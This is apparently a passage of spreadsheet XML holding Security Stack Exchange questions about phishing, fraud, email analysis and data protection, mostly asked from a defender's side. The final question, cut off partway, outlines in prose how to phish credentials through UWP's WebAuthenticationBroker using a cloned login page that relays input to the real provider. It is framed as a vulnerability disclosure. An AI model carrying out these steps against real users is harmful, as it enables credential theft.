 &lt;p&gt;I have no reason to believe that I am personally the victim of a hack or phishing. I use anti-virus and am careful with online transactions.&lt;/p&gt;
 &lt;p&gt;My questions are:&lt;/p&gt;
 &lt;p&gt;(1) Is it normal for banks to be able to give more information about a specific fraudulent transaction to their customers to help them understand how much information has been compromised?&lt;/p&gt;
 &lt;p&gt;(2) What is the best way to approach finding how much information may have been stolen and how?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;fraud&gt;</t>
  </si>
  <si>
    <t>"fake" phishing mails from CST</t>
  </si>
  <si>
    <t>&lt;p&gt;I work in the computer security team of my company and my team leader ask me to send "fake" phishing mails to my colleagues. The mails intended to lure them into clicking on the embedded links (the links lead to an informative webpage on phishing).&lt;/p&gt;
 &lt;p&gt;I am a bit puzzled to try to trap my colleagues. Is it ethically acceptable to trap my colleagues? Is it legal (for French laws for instance)?&lt;/p&gt;
 &lt;p&gt;Thank you&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;legal&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Best Practices for exporting sensitive database data and transforming it whilist keeping it encrypted?</t>
  </si>
  <si>
    <t>&lt;p&gt;Say one has to export database data to use in another tool, such as an Excel Spreadsheet or for use as a csv file with some other program.&lt;/p&gt;
 &lt;p&gt;There's a problem with this, and that's that it ends up in an unencrypted form on the disk, where it can be forgotten about, snatched up by phishing, etc.&lt;/p&gt;
 &lt;p&gt;So when storing / using / getting rid of this sort of data, is there some sort of OS level solution (LUKS) for working with then getting rid of these sorts of temporary files?&lt;/p&gt;
 &lt;p&gt;I know when one uses SSH-agent the keys can be given a time limit to be stored in memory, before it's deleted, is it possible to do the same thing with an encrypted directory or encrypted volume, that can be "scrubbed" automatically, after a certain period of time?&lt;/p&gt;
 &lt;p&gt;Also, it would be crazy to do something like upload such a csv file stored encrypted on the disk to a web application that runs over HTTP and thus leave such things moving over a network encrypted when it moves across the network, that would destroy the point of encrypting it, even if it was encrypted on disk.&lt;/p&gt;
 &lt;p&gt;And also what about allowing an approved running process to access the information but not allowing it to be copied elsewhere? That sort of thing sounds in the domain of permissions / ACLs to me.&lt;/p&gt;
 &lt;p&gt;Is it best to have a designated machine for doing this and limiting it's access to the outside world using a separate subnet / firewall / proxy or some combination there of?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;databases&gt;&lt;data-leakage&gt;&lt;file-system&gt;&lt;third-party&gt;&lt;prevention&gt;</t>
  </si>
  <si>
    <t>What does this phishing email achieve?</t>
  </si>
  <si>
    <t>&lt;p&gt;The email is formatted as an email from Google notifying me that I need to respond to an intrusion attempt on my account. There are no other links other than these &lt;code&gt;href mailto&lt;/code&gt; links ("Oui Moi!" and "pas moi!") to have me send "pas moi" (meaning "not me") to 39 email addresses.&lt;/p&gt;
 &lt;p&gt;My Google ID (blurred) appears several times in the recipients list (blurred but framed in red). I understand this allows them to exfiltrate that piece of information (my ID). &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/G4hmW.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/G4hmW.png" alt="enter image description here"&gt;&lt;/a&gt;
 &lt;a href="https://i.stack.imgur.com/NKAjs.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/NKAjs.png" alt="enter image description here"&gt;&lt;/a&gt;
 &lt;a href="https://i.stack.imgur.com/3YjdU.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/3YjdU.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are the criteria to choose a secure operating system?</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say I have a new and empty desktop or laptop computer and I want to decide which operating system to use. I plan to use this computer in a small home LAN with internet access. There are other devices in this network, but nothing too fancy - so no server or anything like that. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What am I doing with my computer?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;We are talking about recreational use 95% of the time. This consists mostly of browsing the interwebz: news sites, social media, and the occasional streaming site, where there are all these naughty ads that I can't block. Other than that it's a bit of gaming and again: nothing too fancy. The other 5% are online banking or remote logins to my work machine possibly via VPN.&lt;/p&gt;
 &lt;p&gt;Here's a possible (very boiled down) threat model:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Assets:&lt;/strong&gt; &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Personal data (photographs, text files)&lt;/li&gt;
 &lt;li&gt;login credentials (social media, Email, banking accounts, work VPN)&lt;/li&gt;
 &lt;li&gt;access to the filesystem&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;strong&gt;Threats:&lt;/strong&gt;&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;a variety of non-targeted attacks like: phishing mails, ransomware attacks, drive-by downloads etc. (typical - high probability)&lt;/li&gt;
 &lt;li&gt;targeted attacks (very untypical - very low probability)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I am a mediocrely tech-savvy user. To give you a broad idea: I'm able to install software and do some configuration changes. &lt;/p&gt;
 &lt;p&gt;Now with all this in mind:&lt;br&gt;
 &lt;strong&gt;What are the criteria when choosing a secure operating system for a computer?&lt;/strong&gt; I am aware that there are a ton of other possibilities to hack into my machine, but in this question I want to focus on the operating system.&lt;/p&gt;
 &lt;p&gt;Bonus question: Adjust the parameters to a tech-savvy user, with a lot less recreational and way more work related usage of the machine. How do the criteria change?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Disclaimer: I do &lt;strong&gt;not&lt;/strong&gt; want a product recommendation. I want to know &lt;em&gt;how&lt;/em&gt; I should look for a product. &lt;/p&gt;
 &lt;p&gt;&lt;sup&gt;Disclaimer 2: This is not about me but about a "generic" user.&lt;/sup&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;operating-systems&gt;</t>
  </si>
  <si>
    <t>How to handle a phishing site?</t>
  </si>
  <si>
    <t>&lt;p&gt;I launched my company website a month ago, now when I google using website name a phishing site that has exactly copied my site appears in the first page. It also has a better rank than my website which was initially at first page, but now it isn‚Äôt. How to handle this situation and prevent this in the future since a part of my service includes developing websites for my clients.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Could I counter SiteKey MitM attack with user-agent identification?</t>
  </si>
  <si>
    <t>&lt;p&gt;I find it very strange that bank use service like &lt;a href="http://en.wikipedia.org/wiki/SiteKey" rel="nofollow noreferrer"&gt;SiteKey&lt;/a&gt; without user-agent identification. This still makes them very vulnerable to &lt;a href="http://paranoia.dubfire.net/2007/04/deceit-augmented-man-in-middle-attack.html" rel="nofollow noreferrer"&gt;MitM attack&lt;/a&gt; which is exactly what they are trying to protect against with this technique.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;How a man in the middle attack works against an online bank. The user
  communicates with the the phisher, while believing that she is
  speaking to the bank. The phisher can use deceit to query the user for
  more information than the bank would normally ask for. Using this
  additional information, the phisher can communicate with the bank,
  while pretending to be the user.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;I was wondering if using user-agent identification would help against MitM attack.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;The idea behind user-agent identification is that it's a secret that is known to the user-agent, like the browser, but it not known to the user. This makes a difference because the user-agent will only send his secret to the real website, while a user might write down his secret to any phishing site.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;An example would be to set a cookie to identify the browser via a link sent in an email to that user. When the user access the link, it sets a cookie for the site it wants to log in.&lt;/p&gt;
 &lt;p&gt;Then, when the user want to log in to that site, the site check if the browser the user is using have that specific cookie. &lt;/p&gt;
 &lt;p&gt;If he does, then the site show the SiteKey phrase and picture.
 If he doesn't, then the site ask the user to identify it's browser.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Glossary&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;strong&gt;&lt;em&gt;User&lt;/em&gt;&lt;/strong&gt; : The person trying to access a website. Example : you&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;&lt;em&gt;User-agent&lt;/em&gt;&lt;/strong&gt; : It's the tool that the user use to access a website. Example : a browser&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;&lt;em&gt;User-agent secret&lt;/em&gt;&lt;/strong&gt; : Something that is known by the user-agent, but not necessarily by the user. Example : a cookie&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;&lt;em&gt;User-agent identification&lt;/em&gt;&lt;/strong&gt; : The process by which the website the user is trying to access validate that a specific user-agent is
 authorized to access this website under that specific username.
 Example : by validating that a cookie containing a secret code
 associated to the username is set on that browser&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;Additional notes&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;SSL/TLS&lt;/em&gt;&lt;/strong&gt; : Of course you need that since there is no security without it...&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;Why do we need to set the cookie by an email link?&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;If you read about SiteKey, you will find out that they are indeed trying to do user-agent identification using a cookie! But they are &lt;a href="http://paranoia.dubfire.net/2007/04/deceit-augmented-man-in-middle-attack.html" rel="nofollow noreferrer"&gt;failing&lt;/a&gt;...&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Why does BoA allow users to get access to their SiteKey image after
  answering her security questions? The reason is simple. Normally, BoA
  knows to present the right SiteKey image to a user because it
  recognizes the computer that user logs in from as belonging to the
  user in question. This is done using secure cookies. But what happens
  if there are no cookies? Say that the user wants to log in to her BoA
  account from a computer that she has not successfully used to connect
  to BoA's website with before. Before sending the SiteKey image to the
  user, BoA will require the user to provide some evidence of her
  identity - the answers to the security questions. Once BoA receives
  these, and has verified that they are correct, then it will send the
  user's SiteKey image to the user. That allows the user to verify that
  it is really communicating with BoA, and not an impostor, which in
  turn, provides the user with the security to enter her password.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The problem is that the way to prove the user identity is by asking him a question... The phishing site can then directly ask this question to the user and it's game over.&lt;/p&gt;
 &lt;p&gt;It's different if the cookie is set by a link in an email. If the website doesn't recognized the broswer, it will send an email to the user. This means that unless the attacker, the phishing site, has access to the user email, he cannot set the cookie hence he cannot impersonate the user.&lt;/p&gt;
 &lt;p&gt;It's also important that the cookie is set by visiting a link and not by writing a secret code that you receive by email. If you can't trust the user to enter his password on the right site, can you trust him to enter the code on the right site?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Other interesting links&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/26332/what-is-this-authentication-method-approach-called"&gt;What is this authentication method/approach called?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/26347/is-sitekey-a-valid-defense-against-phishing"&gt;Is SiteKey a valid defense against Phishing?&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What's The Best PHP Encryption For Email Addresses?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm storing a list of email addresses and other not personally identifiable information for a mailing list in a database. Since it's for a project related to cryptocurrency, I believe that the information could be a target for future attack. Specific scenarios I am aiming to protect against:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Someone in the shared hosting environment or a server administrator (for example, rogue employee) decides to copy the email addresses to sell on the dark web, where it could be used for phishing.&lt;/li&gt;
 &lt;li&gt;A part of the site or service is vulnerable to some kind of exploit that inadvertently gives access to the database. (Despite my best practices and careful development I left one single page open to SQL injection, for example.) This gets exploited by an attacker to get emails and phish the site members.&lt;/li&gt;
 &lt;li&gt;The server becomes vulnerable due to an exploit elsewhere on another shared hosting account, which is then able to gain elevated privileges and access the database using high level server access.&lt;/li&gt;
 &lt;li&gt;A backup service is used in the future, and this stores data insecurely or is not trustworthy, thus resulting in the copy of the backup being accessed and members getting phished.&lt;/li&gt;
 &lt;li&gt;At some point, the wrong individual is trusted to develop a feature of the site - either given access due to high trust or providing code with a backdoor that isn't noticed in careful inspection of provided code.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The above could be extremely damaging to the project. I'd like to ensure that the plain text email addresses can't be accessed in those or similar scenarios, should all other protection mechanisms and best practices fail.&lt;/p&gt;
 &lt;p&gt;The email addresses will only be used for a periodic newsletter, so there is no need to have persistent access to the information. The idea I have is to encrypt the email addresses using a secure private key that's stored offline and only accessible to me. I would use the key to decrypt the email addresses only when sending the newsletters, and otherwise email addresses would remain encrypted.&lt;/p&gt;
 &lt;p&gt;I had some basic questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Which encryption algorithms make sense? I'd like something that's easy to work with in PHP, been around for a while, and that there aren't any known exploits.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;One issue is that new email address would have to be encrypted when a person signs up. I could leave them in plaintext for a period of time, but my concern is that's going to be a pain to keep doing and I might not get around to encrypting them quickly. Is there such a thing as an algorithm where one key can be used to encrypt the information, which is different from the decryption key? ie The decryption key works to decrypt any secret, but the encryption key is one-way only. I was curious if this is possible.&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Bonus points if someone can provide some simple PHP examples that I could play with. That would be really awesome!&lt;/p&gt;
 &lt;p&gt;Note: I have checked out some other pages:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/9575/mysql-two-way-encryption-of-sensitive-data-email-addresses-outside-of-apache"&gt;Mysql - two-way encryption of sensitive data (email addresses) outside of Apache, PHP and MySQL&lt;/a&gt; seems like quite a different use case, since they need continual access which I do not&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/222103/encrypting-email-addresses-in-php"&gt;Encrypting email addresses in php&lt;/a&gt; wants hashing, and also continual access which I do not&lt;/p&gt;
 &lt;p&gt;Thanks so much for your help and insight!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;privacy&gt;&lt;php&gt;&lt;databases&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Any campus email systems automatically testing links?</t>
  </si>
  <si>
    <t>&lt;p&gt;I heard that there are some university campus email systems that "click" all the links on incoming emails and thus inadvertently unsubscribe recipients from email distribution lists if the email contains a one-click unsubscribe link. Does this exist? Has anyone had first-hand experience with this from either sender, campus IT or recipient end? Is it then possible to get whitelisted by such systems?&lt;/p&gt;
 &lt;p&gt;I'm having a hard time believing this exists. It would overturn the wishes of all the recipients who willingly subscribed. Are there any negative security implications in doing this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;automation&gt;</t>
  </si>
  <si>
    <t>Is there a list of phone numbers Facebook uses to send auth tokens?</t>
  </si>
  <si>
    <t>&lt;p&gt;Up to a few days ago, I always received Facebook auth tokens from numbers &lt;code&gt;+181338477XX&lt;/code&gt;, except a few times from &lt;code&gt;+85294985XXX&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Problem is that lately I've been receiving codes directly from Italian numbers, which wouldn't be strange since I'm located in Italy, but there are two odd things:&lt;/p&gt;
 &lt;p&gt;1.
 they are much much slower than before, i.e. may take easily 2~15 minutes, while before they were instant&lt;/p&gt;
 &lt;p&gt;2.
 they are badly formatted, not exactly with spelling mistakes like the typical phishing mail, but oddly they add random characters in the text (examples follow)&lt;/p&gt;
 &lt;p&gt;Regular message:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;code&gt;Il tuo codice di sicurezza di Facebook: XXXXXX&lt;/code&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Odd messages:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;+393460286641 &lt;code&gt;Il,tuo codice'di sicurezza di Facebook: XXXXXX&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393774919485 &lt;code&gt;Il tuo codice di,sicurezza_di Facebook: XXXXXX'&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393428446457 &lt;code&gt;Il tuo codice,di sicurezza di Facebook: XXXXXX,&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393385643500 &lt;code&gt;Il tuo,codice di sicurezza_di Facebook: XXXXXX.&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393806332520 &lt;code&gt;Il,tuo codice,di sicurezza di Facebook: XXXXXX&lt;/code&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;hr&gt;
 &lt;p&gt;edit for some new SMS:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;+393455720151 &lt;code&gt;Usa 033985'come_password per Facebook Messenger for.Android.&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393402647316 &lt;code&gt;Usa 033985 come password'per Facebook Messenger for Android._&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393456388686 &lt;code&gt;Usa 808589 come password per Facebook for Android.'&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;+393484224323 &lt;code&gt;Usa 808589 come password per.Facebook for.Android.&lt;/code&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;em&gt;(these are different because it's not the web login but the Android app logins, but still weird characters appear)&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;I have two phone numbers bound to that FB account. Previously I logged only the message of one of those phones. Now instead o logged them on both phones, and it is interesting to notice how even the "same" message was corrupted in different ways.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;The first odd thing is those random characters (so far &lt;code&gt;,&lt;/code&gt;,&lt;code&gt;'&lt;/code&gt;,&lt;code&gt;_&lt;/code&gt;,&lt;code&gt;.&lt;/code&gt;) either between two words or at the end of the string, and the second odd thing is that the phone numbers are always totally different, while before they were using only two "main" numbers, with many "sub" numbers (pardon the made-up terms).&lt;/p&gt;
 &lt;p&gt;I'm totally clueless about &lt;em&gt;who&lt;/em&gt; could do such a thing such as hijacking &lt;code&gt;SMS&lt;/code&gt;s, &lt;em&gt;why&lt;/em&gt; corrupt the messages this way, and why do that and &lt;em&gt;not&lt;/em&gt; use it: i.e. looking at the logins, authorised devices, etc. there wasn't anything unusual.&lt;/p&gt;
 &lt;p&gt;A final oddity has happened the first time we received such a message: there are two phones bound for these auth tokens, and only one of those received the strange message, while the other one received the correct one (both were delayed, though).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;sms&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Another domain is using our web app's IP address. How to prevent it?</t>
  </si>
  <si>
    <t>&lt;p&gt;Our web application is being mimicked by another domain, &lt;a href="https://www.djjpl.com.sg" rel="noreferrer"&gt;https://www.djjpl.com.sg&lt;/a&gt;. On ping, it gives the same IP address as ours. Every git push to our server reflects on that domain.&lt;/p&gt;
 &lt;p&gt;We want to stop that domain from mimicking our app. How can we prevent it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Do I REALLY need to change my email password when idnotify.com Dark Web Monitoring recommends?</t>
  </si>
  <si>
    <t>&lt;p&gt;I occasionally get alerts from idnotify.com Dark Web Monitoring, such as this one:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;08/31/2019 
 COMPROMISED EMAIL ADDRESS
 Email Addresses: Jt***an@gmail.com
 Date Found: 08/26/2019
 Password *************************
 Potential Site DUBSMASH.COM
 Immediately change the password for the email address that was found compromised.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;My thoughts:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;My email account uses 2-factor authentication. So unless I know for &lt;em&gt;sure&lt;/em&gt; that someone &lt;em&gt;somehow&lt;/em&gt; learned my &lt;em&gt;actual&lt;/em&gt; password, I don't know why I'd want to change my password every time I get one of these alerts.&lt;/li&gt;
 &lt;li&gt;The amount of asterisks in the "Password" in these alerts differs. Some alerts say &lt;code&gt;*************************&lt;/code&gt; and others say &lt;code&gt;********&lt;/code&gt;. I don't know if the lengths are reliable, but if the length doesn't match my real password, I wonder if that means I don't need to change it.&lt;/li&gt;
 &lt;li&gt;What the heck does Dubsmash have to do with anything? That app sounds only vaguely familiar. I checked my password manager and don't seem to have an entry for it.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;P.S. It's not phishing. After the Equifax breach, I enrolled in their TrustedID program in Sep 2017. In Nov 2018, they gave me "this extension of free credit monitoring through IDnotify‚Ñ¢, a part of Experian."&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;darknet&gt;</t>
  </si>
  <si>
    <t>Is Twitter digits login (sms auth code) insecure?</t>
  </si>
  <si>
    <t>&lt;p&gt;Twitter released(some time ago) a new kit named &lt;a href="https://dev.twitter.com/twitter-kit/web/digits"&gt;Digits&lt;/a&gt; which allows the client to login with a phone number and an authorization code (received through sms). I find it great for the user experience and I was thinking to implement it on our app/website too but isn't this "very" insecure? 
 I can imagine several issues:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;strong&gt;the phone number is easy to guess&lt;/strong&gt;: This allows the attacker to run successful blind SPAM campaigns even location-based(state, city based on the prefix). If most of the internet users would use phone numbers instead of email addresses I'm sure the amount of spam they receive would be higher. The spammers won't need to worry about email addresses harvesting. They would just generate phone numbers with a good chance to catch valid/active ones. &lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;the sms is insecure&lt;/strong&gt;: Unlike the email service the SMS has no authentication protocol(as far as I know) such DKIM, SPF so even experienced clients are unable to verify the integrity of the sender(i.e. if it's twitter or a spoofed number). Once you register/authenticate with the phone number you also establish SMS as communication channel. So it's not only the authentication code that you receive through sms but all the communications (confirmations or whatever twitter sends) are are sent though a channel which doesn't support authentication. This is basically like email without DKIM, SPF and even without any SPAM filter. &lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;disturbance:&lt;/strong&gt; brute forces most of the the valid phone numbers just for fun to generate disturbance(i.e. make twitter send auth codes to all the possible phone numbers). There may be sensible IP restrictions but I can't see this stopping the attacker.&lt;/li&gt;
 &lt;li&gt;&lt;strike&gt;&lt;strong&gt;data harvesting -&gt; malware&lt;/strong&gt;: The attacker finds what phone numbers are registered on twitter(see brute-force), sends them SMS (which looks like a twitter notification) with malicious links.&lt;/strike&gt;&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;phishing&lt;/strong&gt;: the client may be more willing to disclose a code received through sms than a password. If a phishing form is asking for a sms received from twitter(MITM) I think the client is more willing to provide it than a password as the code is received on request (not expected to be a secret the client is remembering) and the process( wait for the SMS and copy/paste it) distracts the client from the login page. It's also worth to note that the SMS notification covers the header of the UI(address bar).
 &lt;img src="https://i.stack.imgur.com/eqFHE.png" alt="enter image description here"&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/jYorO.png" alt="enter image description here"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;brute-force&gt;&lt;phone&gt;</t>
  </si>
  <si>
    <t>user29154</t>
  </si>
  <si>
    <t>Danger in opening spam emails on Ubuntu operating system</t>
  </si>
  <si>
    <t>&lt;p&gt;Some emails are suspected to be viruses; Because of that, the email service store categorizes them as spam. Or some pages are suspected to be viruses, and new browsers classify them as harmful pages. As you know, many viruses and malware can't run on Linux (like &lt;a href="http://www.ubuntu.com" rel="nofollow"&gt;Ubuntu&lt;/a&gt;). Here is my question: Can harmful pages or those type of spam (junk) emails harm my data? Maybe by phishing, data transfer (from my HDD), attacking cookies, or any other types of hacks?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;linux&gt;&lt;email&gt;</t>
  </si>
  <si>
    <t>How can a router or my ISP protect against phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I see a few services advertising the ability to protect against phishing and ransomware attacks. ISPs sell services which supposedly protect you and some routers like Check Point 700/900 series. Is this real? How does this work? If I download malware/ransomeware or am sent a phishing email - that's likely TLS encrypted. Can the ISP/router decrypt and scan such traffic? Or is what they're advertising only for non encrypted traffic or just doesn't work?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;tls&gt;&lt;phishing&gt;&lt;router&gt;&lt;isp&gt;</t>
  </si>
  <si>
    <t>Email header red flag</t>
  </si>
  <si>
    <t>&lt;p&gt;I am to analyze email headers for spam/phishing attempts. What is the methodology I should follow by only looking at the header? I know that I have to look at the from field, return-path, received, sender policy framework but can you provide some examples or some hints? How can I recognize through the various hops that it could be suspicious?&lt;/p&gt;
 &lt;p&gt;In particular I need to formalize an eventual theory about any possible fraud attempts. I want better understand:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;what the first hop is actually describing, in the sense that it is a hop between the first Message Transfer Agent and the next one, meaning that it is not representing the hop between the machine of the user and the first mail exchange server, or could also represent this last situation? (For example I am analyzing some emails and in some cases the first hop is "from apache by "some domain" ", or "from user[IP number] by "some domain" ");&lt;/li&gt;
 &lt;li&gt;if there is a hop in which there is the name of the mail exchanger and also the IP next to it, in an enclosed parenthesis, but it looks like that the IP is in another country, what does it mean? &lt;/li&gt;
 &lt;li&gt;how should SPF be interpreted (the check refers the machine of the sending server so the first hop)?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Cmd line tool to scan an eml file against spam/phishing rules</t>
  </si>
  <si>
    <t>&lt;p&gt;For a purpose of a security class I want to demonstrate a threat delivered via email. As a demo message I want to use an eml file that contains a banking-themed pdf attachment, requiring further actions from the user. I want to scan the eml file with a security tool indicating in particular how important it is to have these kind of checks, how output can be logged etc. I know there are plenty of commercial tools out there that provides this end-to-end email security however I want to get as granular as I can so students can visualize the problem better rather than understanding there is a black-box solution that does &amp;quot;the entire security&amp;quot;.&lt;/p&gt;
 &lt;p&gt;What would be a Linux tool that is capable of recognizing threats in eml files? Both from an email perspective (poor grammar, SPF checks, wording, calling to action - buliding spam scoring) as well as link/attachment perspective?&lt;/p&gt;
 &lt;p&gt;I was thinking about spamassassin however scanning a first random eml (that has a lot of hits on VirusTotal) gives me spam score of 1.3 while 5.0 is the default threshold. Is spamassassin still maintained? Is there any updated rules repository I can use?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;linux&gt;&lt;email&gt;&lt;phishing&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>Does it Matter That Universal Windows Platform (UWP) is Open to Phishing Attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few years ago (a little over three now to be exact), &lt;a href="https://social.msdn.microsoft.com/Forums/en-US/794d3545-1041-4ec8-92eb-c40308318f82/webauthenticationbrokerauthenticateasync-verification?forum=winappswithcsharp" rel="nofollow"&gt;I brought up what I consider to be a rather obvious (and serious) security issue with the Universal Windows Platform (UWP)&lt;/a&gt;: The ability to use its &lt;a href="https://msdn.microsoft.com/en-us/library/windows/apps/xaml/windows.security.authentication.web.webauthenticationbroker.aspx" rel="nofollow"&gt;WebAuthenticationBroker&lt;/a&gt; to phish credentials from a UWP application.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://social.msdn.microsoft.com/Forums/windowsapps/en-US/61430b68-0df7-4605-b714-809a361e1167/uwp-is-it-still-possible-to-hack-phish-webauthenticationbroker?forum=wpdevelop" rel="nofollow"&gt;I recently brought this issue back up and it has been confirmed that this is still an issue in UWP&lt;/a&gt;. I would consider this a security issue that someone could exploit via a phishing attack, so rather than continue the discussion there I am bringing it here to get better understanding around my perception around it.&lt;/p&gt;
 &lt;p&gt;Now I am by no means an expert in security, but I love learning about it and I always have my eyes and ears open for scenarios exactly like this one. I am grateful for having found out about this site which is why I am posting this here question now. If I had known about this site back on December 2012 when I originally posted this question, I would have posted my original question here rather than on the MSDN forums (where it was basically ignored and not taken very seriously, in my view).&lt;/p&gt;
 &lt;p&gt;With that said, my understanding of exploiting this process is as follows:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Create a sign-in page that looks exactly like the signin page from Google or Facebook (or your authentication service provider of choice). For starters, you would create this by going to target provider's login page and saving the source of the file and use that as the starting point.&lt;/li&gt;
 &lt;li&gt;Modify the file made in the previous step so that it takes user input and passes it to the real authentication service provider. Account for when the credentials pass and for when they fail.&lt;/li&gt;
 &lt;li&gt;Find a server to host the above file, deploy the file(s) (perhaps multiple files, as it could involve server-side magic) to this host and get the URL to the deployed location that loads this file.&lt;/li&gt;
 &lt;li&gt;Create a UWP application that gets the user to login to a supported credential provider via the WebAuthenticationBroker. In the &lt;a href="https://msdn.microsoft.com/en-us/library/br212068.aspx" rel="nofollow"&gt;WebAuthenticationBroker.AuthenticateAsync&lt;/a&gt; call, provide the URL to the deployed location in the previous step.&lt;/li&gt;
 &lt;li&gt;Deploy the application to the Windows Store. Get users to download it and use it (How exactly? &lt;a href="https://www.youtube.com/watch?v=tO5sxLapAts" rel="nofollow"&gt;That is where your creativity comes in&lt;/a&gt;).&lt;/li&gt;
